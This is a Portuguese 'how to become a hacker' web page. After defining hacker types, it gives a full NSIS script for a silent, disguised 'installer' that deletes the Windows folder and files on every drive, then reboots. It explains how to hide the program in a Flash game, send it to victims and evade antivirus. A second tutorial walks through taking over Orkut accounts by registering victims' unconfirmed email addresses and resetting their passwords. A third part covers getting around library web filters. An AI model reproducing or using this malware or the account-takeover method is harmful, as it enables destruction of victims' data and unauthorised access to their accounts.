Como se tornar um Hacker

Orismar & Ezequiel

Hackers

INTRODUÇÃO


Várias são as fantasias e a imaginação
 das pessoas sobre esta figura 
assustadora que navega no mundo
 virtual. Então, vamos começar definindo primeiramente o que são estas figuras.

"Hacker":

É aquele que tem conhecimentos profundos de sistemas 
operacionais e linguagens de programação,
 principalmente "Unix" e "C" respectivamente. 
Conhece as falhas de segurança dos sistemas e
 está sempre a procura de novas.

"Cracker":

O mesmo que "hacker", com a diferença de
 utilizar seu conhecimento para o "mal". Destruir
 e roubar são suas palavras de ordem.

"Phreaker":

Especializado em telefônia, atua na obtenção
 de ligações telefônicas gratuitas, instalação de
 escutas, facilitando o ataque a sistemas a partir
 de acesso no exterior, tornando-se invisíveis ao 
rastreamento ou colocando a responsabilidade 
em terceiros. Devido ao grande número de pessoas 
que hoje se dizem "hackers", novas definiçõe
poderão ser encontradas.

"Lammer":

É quem está tentando ser "hacker", sai
 perguntando para todo mundo o que fazer
 para tornar-se um. Mas só faz merda, não tem 
amigos na Net, e só sabe vacilar.

"Wannabe":

É o principiante que já aprendeu a usar os
 programas prontos dos verdadeiros "hackers".

"Aracker":

O pior de todos, são os "hackers de araque"
Pensam que sabem tudo e acabam acessando
 revistas virtuais pornográficas nas madrugadas.


----------------------------------------

BOM, AGORA QUE VOCÊ CONHECE 
TODOS OS TIPOS DE HACKERS, VOU 
ENSINAR UM POUCO DE COMO SE 
TORNAR UM. 


Aqui postarei alguns tuturials:

Criando Vírus que detona o HD:

Pra que você quer saber como criar um vírus? Bem...
 A responsabilidade é sua, blz? Nesta dica você terá
 uma aulinha prática de como criar um vírus que detona
 TUDO do HD.



NÃO FAÇA COMENTÁRIOS COM MÁS INTENÇÕES. 
NÃO AJUDAREMOS VOCÊ A PREJUDICAR NINGUÉM. 
CONTEÚDO DESTE ARTIGO VISA MOSTRAR
 NOÇÕES IMPORTANTES PARA TODOS OS LADOS.
 O USO QUE SE FARÁ DELE 
É DE TOTAL RESPONSABILIDADE DOS USUÁRIOS.
 COMENTÁRIOS INDESEJADOS SERÃO IGNORADOS,
 E CASO SEJAM OFENSIVOS OU VÁ CONTRA OS 
PRINCÍPIOS DO SITE, SERÃO REMOVIDOS SEM 
AVISO PRÉVIO.
Um vírus é um programa do mal, que faz mal ao sistema
 operacional, a outros programas ou a arquivos do
 computador. Podem ser ainda de outros tipos,
mas estes são os mais comuns. Basicamente,
 um vírus é um programa. Um programa com
 instruções que poderiam ser usadas para o bem,
 mas aplicadas para o mal. Portanto, para fazer um
 vírus, aprenda a fazer programas. Existem, no entanto,
 meios mais simples que permitem a criação de vírus
 usando determinadas estratégias, ferramentas e
 recursos já existentes. Além de saber fazer o vírus,
você deve saber o que ele fará. O vírus ataca alguma
 coisa. Você deve conhecer essa coisa, seus pontos
 fracos e fortes, verificar caminhos por onde entrar.
 E como rodá-lo? O meio mais simples é convencer
os usuários a executar o arquivo do vírus nos seus
 computadores. Ou você mesmo, por exemplo, pode
 executá-lo no computador do chefe enquanto ele
 estiver almoçando - mas se prepare para arcar
 com as consequencias depois, pois isso pode ser
ilegal. Para ajudar, existem programas que embutem
 um executável dentro de outro, de modo que um seja
 executado normalmente, e o outro de forma oculta. Isso
 permite, por exemplo, criar um joguinho em flash
(ou pegar uma dessas muitas animações distribuídas
 em .exe, o projetor do flash), embutir o vírus nele
 e mandar pra pessoa. Ela abre, vê o joguinho, acha
 lindo. E por trás de tudo isso, enquanto ela está
distraída e entretida, o vírus trabalha. Ou simplesmente
 se copia para alguma pasta, cria entradas no registro
 do Windows para se iniciar na próxima sessão, e
 ataca a partir dali.
E os anti-vírus, como ficam? Irão bloquear seu vírus?
 Eles não sabem se um programa é um vírus ou não,
a menos que tenham a "identidade" deste programa
 marcada como "suja", como um vírus. Isso acontece
quando o vírus fica muito divulgado, e acaba caindo
nas mãos do pessoal das empresas de anti-vírus. Eles
checam o arquivo, fazem testes e mais testes.
Comprovado o caso de ser um vírus (ou seja, de ser
 um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma
somatória MD5, um trecho de código existente no
arquivo, uma seqüência de operações que
 provavelmente só existam naquele arquivo, etc).
 E cadastram esse código no anti-vírus. Ao fazer a
 varredura, se o anti-vírus identificar algum arquivo
com algumas qualidades cadastradas em seu banco
de dados, ele entenderá ele como vírus e tentará
 eliminá-lo ou notificar o usuário. Por isso é bom estar 
sempre com seu anti-vírus atualizado, pois praticamente
 todo dia surgem novos vírus. Estando atualizado,
 ele pode identificar os vírus mais recentes. Mesmo 
que um programa seja o pior vírus já inventado, 
se ele não estiver catalogado no anti-vírus, ele
 provavelmente se dará muito bem e executará suas
 funções. Depois? Depois é tarde, né. Já eu, particularmente,
 não uso anti-vírus, pois sei me cuidar.
Não quero um programa verificando tudo o que faço e
 deixando meu micro mais lento. Muita gente reclama do
 Windows e talz e bla bla bla. Mas essa gente poderia
parar um pouco e pensar nela mesma, nas atitudes. A 
maioria dos vírus e spywares só consegue realizar seus
 objetivos porque o usuário do computador vacilou. Mas
 blz, isso não vem ao caso agora.
Um vírus não precisa ser necessariamente um programa.
Você deve estudar e conhecer o que quer atacar, e usar
meios para isso. Por exemplo, apagar arquivos. Criar um
 ".bat" com o comando "deltree %systemroot%" adaptado
 para não mostrar nada, por exemplo. Esse arquivo pode
 ser considerado um vírus, embora é um simples arquivo
ASCII, de texto puro. O interpretador de comandos é que
vai executar as ações, de acordo com o que estiver indicado.
De forma semelhante agem os vírus de scripts e macros: por
isso, é bom tomar cuidado com apresentações do Power Point de
 desconhecidos, arquivos do Word, etc. Não precisa ser
 paranóico e ficar sem abrir esses arquivos, basta pensar
e desativar as macros no seu programa, entre outros cuidados.
Usar o visualizador do PowerPoint, em vez do PowerPoint
completo, é uma boa idéia para ver apresentações da
 Internet, já que as macros e arquivos vinculados nem
serão interpretados. No caso de scripts ".js" ou ".vbs", só
 execute-os se souber realmente o que está fazendo. Destaco
que esse ".js" não é de "JavaScript", pois esta mesma extensão é
usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas
paranóias. Não é porque a AIDS come solto que você vai
deixar de transar com pessoas que conhece a pouco tempo 
ou na balada, mas deverá se cuidar, né? A mesma coisa 
pode ser dita em termos de PCs. Execute programas, rode,
 teste, fuce, explore, mas com responsa. Isso fica por sua conta.
 Do mesmo jeito que "sexo 100% seguro é não fazer sexo", eu 
diria que "navegar na Internet de forma 100% segura é não
 navegar na Internet". Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha
 legal, e pode pegar um resfriado... Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet 
(nem modem nem placa de rede ele tem).
O exemplo a seguir usa o NSIS para criar um arquivo que tenta
apagar tudo do PC. Ele funciona bem em partições sem
permissões de acesso, caso de FAT32. Não funcionará
adequadamente em partições NTFS, mesmo se rodado como administrador, pois o Windows Vista e Windows Seven
têm medidas de segurança mais aprimoradas. Não é fácil
 trocar ou apagar arquivos do sistema, é necessário trocar
 as permissões antes. Ele fica como exemplo "didático", por
motivos de segurança. Note que ainda assim ele pode apagar
arquivos que o usuário atual tenha direitos. Quando a dica foi
escrita era comum o uso do Windows XP, e até mesmo o 98
por muita gente.
Se quiser aprender a fazer vírus, aprenda programação, isso
é só um script do NSIS. Porém seria considerado "vírus" por
usuários que fossem prejudicados pela ação dele.
Bom, chega de teoria, não que não seja importante, mas já
 falei demais. Se você quer fazer vírus, arregace as mangas
e parta para o estudo, você deverá estudar e fuçar muito. E
 cuidado para o feitiço não virar contra o feiticeiro, he he he.
Vou mostrar como fazer um simples programinha devastador,
que apaga TUDO do HD. Tanto os arquivos do usuário como as
 pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque
estarão em uso. Mas apagando a maioria e alguns estratégicos,
 já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).
Apagar arquivos... Sugiro usar o gerador de programas de
 instalação NSIS (Nullsoft Scriptable Install System). Ele é
destinado a desenvolvedores e distribuidores de aplicações,
 mas é muito versátil. Você cria um "falso" programa de instalação,
que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com
as instruções, compila nele, e ele gera o executável baseado
 nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb.
Mas você poderia usar, é claro, outros instaladores...
Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é
gratuito (e open source). Não vamos nos deter com o script
 dele, vamos direto ao assunto. Ele possui uma função
"Delete", que apaga arquivos ou pastas. Basta você
adicionar os nomes de arquivos ou pastas desejados,
e gerar o programa. Esta função deveria ser usada
 para apagar arquivos de um programa que seria
desinstalado, já que o NSIS é um criador de programas
 de instalação para outros programas. Mas como apaga
arquivos que você define, pode ser usada para o mal
também, só depende das suas intenções. Em menos de
1 minuto seu vírus estará pronto.
AVISO: SE FOR COPIAR E COLAR, CERTIFIQUE-SE DE 
QUE AS ASPAS ESTEJAM RETAS. SE APARECEREM 
ASPAS INCLINADAS, FRESQUINHAS E BONITINHAS
APAGUE-AS, SUBSTITUINDO POR ASPAS DUPLAS 
RETAS, NORMALMENTE FICA NA PARTE SUPERIOR 
DA TECLA ABAIXO DA ESC. SE USAR AS ASPAS 
ENFEITADAS NO ARQUIVO .NSI, O NSIS DARÁ UM
 ERRO NA COMPILAÇÃO. ESSE ERA O MOTIVO PELO
 QUAL MUITOS NÃO CONSEGUIAM COMPILAR.

Com o NSIS instalado, abra um editor de textos puro,
 como o Bloco de notas, e digite (ou copie e cole) o
 texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"

!define PRODUCT_VERSION "1.0"

!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"

OutFile "MeuVirus.exe"

InstallDir "$TEMP"

Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"

SilentInstall silent


Section "Sec001" SEC01

Delete /REBOOTOK "$WINDIR\*.*"

SectionEnd


Section -Post

Reboot

SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos",
no campo "Salvar como tipo". A extensão ".nsi" é a de
 projeto do NSIS, você poderia usar outra qualquer e
depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

(Não é o arquivo executável, você pode baixar sossegado(a). 
É apenas o arquivo de texto pronto. Você pode visualizá-lo
 no bloco de notas ou abri-no no NSIS, e é bem pequenininho.
 Ele está configurado para apagar arquivos de todas
 as unidades, o que conseguir, de forma a limpar pen
 drives se estiverem plugados na hora da execução. 
Cuidado, não clique no botão "Test Installer" em um
 computador com dados importantes.)

Vamos entender esse arquivo... As três primeiras
 linhas identificam o "programa" que seria instalado,
 afinal o NSIS é um instalador. Deixe como está, ou
escreva qualquer coisa, de preferência não palavras.
 O item "OutFile" é o executável que será gerado, é
o seu vírus que deverá ser distribuído. A
linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.
Na seção "Sec01", você deve adicionar as
 entradas "Delete" que desejar. Existem o
utros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.
A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga
 tudo da pasta do Windows, deixando para apagar na
próxima inicialização o que estiver em uso. Copie-a e cole-a
 abaixo dela, antes do SectionEnd, trocando as pastas ou
 arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:\boot.ini"

Delete /REBOOTOK "C:\Meus documentos\*.*"

Delete /REBOOTOK "C:\*.*"

Delete /REBOOTOK "D:\*.*"

Delete /REBOOTOK "E:\*.*"

Delete /REBOOTOK "F:\*.*"

Delete /REBOOTOK "G:\*.*"

Delete /REBOOTOK "C:\Arquivos de programas\*.*"

Adicione o que quiser, arquivos específicos, etc.
A última seção, "Section -Post / Reboot / SectionEnd"
, será executada ao concluir o instalador, ou seja,
quando ele terminar sua ação. O comando "reboot"
reiniciará o computador, que na próxima inicialização
nem inicia mais. Se você quiser, pode remover essas três
 últimas linhas, para deixar o usuário em desespero,
 vendo que tudo do seu PC foi apagado.
Salve o arquivo. Abra o compilador do NSIS,
em "Iniciar > Programas > MakeNSISW (Compiler GUI)",
clique no menu "File > Load script", localize o arquivo
 de extensão ".nsi" que você salvou. Ele já compilará,
é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".
O vírus está pronto! E, em condições normais, nenhum
 anti-vírus o detectaria, a menos que ele fosse parar
 nas mãos de algum criador de anti-vírus.
Como testá-lo sem se ferrar por conta da própria
 criação? Use máquinas virtuais! 
Hackeando Orkut:


Primeiramente, você vai logar no seu orkut 
e vai escolher a sua vítima. Após ter logado,
 no menu superior, selecione amigos e veja 
todos eles. O que vai te interessar são os 
emails dos seus amigos. O únicos em que esse
 método funciona são nos emails que não são 
gmail e também que não estejam confirmados!
 Entendeu? Os emails não confirmados!
Após ter achado sua vítima, você deverá ver 
de qual servidor essa pessoa. Veja o que vem
 depois do arroba (@) do email dessa pessoa, 
por exemplo, se for algumacoisa@hotmail.com,
 então você aplicará o hack através do site 
www.hotmail.com, caso seja 
algumaoutracoisa@yahoo.com.br você aplicará 
no site www.yahoo.com.br. Entendeu?
Depois de você entrar no email, vá seguindo 
os passos de criar um novo email. Na hora de
 dizer qual é o email que você quer criar, 
escolha exatamente aquele email não confirmado 
da pessoa escolhida para hackear. Veja que o
 email não existe e você irá criá-lo. Como isso
 acontece? Essas pessoas não tem email e criam 
emails de mentira para poder usar o orkut, como
 nunca confirmaram esse email ele estará lá como
 não confirmado dentro do orkut.
Você cria o email igualzinho ao da sua vítima.
Após criado o email, entre na tela de login do
 orkut e clique em “não consigo acessar minha 
conta”, depois clica em “esqueci minha senha” e
 depois coloque o email da pessoa no campo que 
o google vai mandar um email pedindo para você 
redefenir a senha da vítima. Abra o email, clique
 no primeiro link e mude a senha.
Agora é só logar e TCHARAM, você terá invadido 
o orkut de alguém!
Lembrem-se, cerca de 10% dos usuários do orkut 
têm emails não confirmados, então você precisará
 de muita paciência e muita sorte para encontrar
 alguém que possa ser hackiado através deste método.
Uma dica importante, não façam isso com muita 
frequência, pois seu IP pode ser bloqueado e
 você pode nunca mais conseguir acessar o orkut 
da sua casa.
Como acessar blogs bloqueados:
Bibliotecas em especial que 
bloqueiam blogs, sites, orkut,
 msn, estão contribuindo para a 
idiotização das massas muito mais
 do que tentando impedi-la. Acesso
 à informação e construção do 
conhecimento não se dá apenas
 através de formatos canônicos 
do conhecimento registrado.
Bibliotecários e gestores da 
informação que se acham 
imponentes o suficiente para 
julgar a qualidade e relevância
 do que circula hoje na web, e 
bloqueiam sites, estão jogando 
no lixo um dos maiores potenciais
 da biblioteca enquanto instituição,
 que é compreender as necessidades
 pontuais da comunidade a qual
 se volta, e oferecer conteúdo 
que faça sentido para a vida dessas
 pessoas.
Existem diversas maneiras de acessar
 sites e blogs bloqueados, 
especialmente para acesso à blogs
 (blogspot e wordpress). Entre 
as formas mais simples de garantir
 acesso, eu sugiro:
1. utilizar um proxy no browser.
 Procure por “proxy browser” no
 google e veja quais deles você consegue acessar.
2. acessar através do leitor de rss. 
Assine o feed do blog e pronto.
3. para sites estáticos, dá pra usar o wayback machine.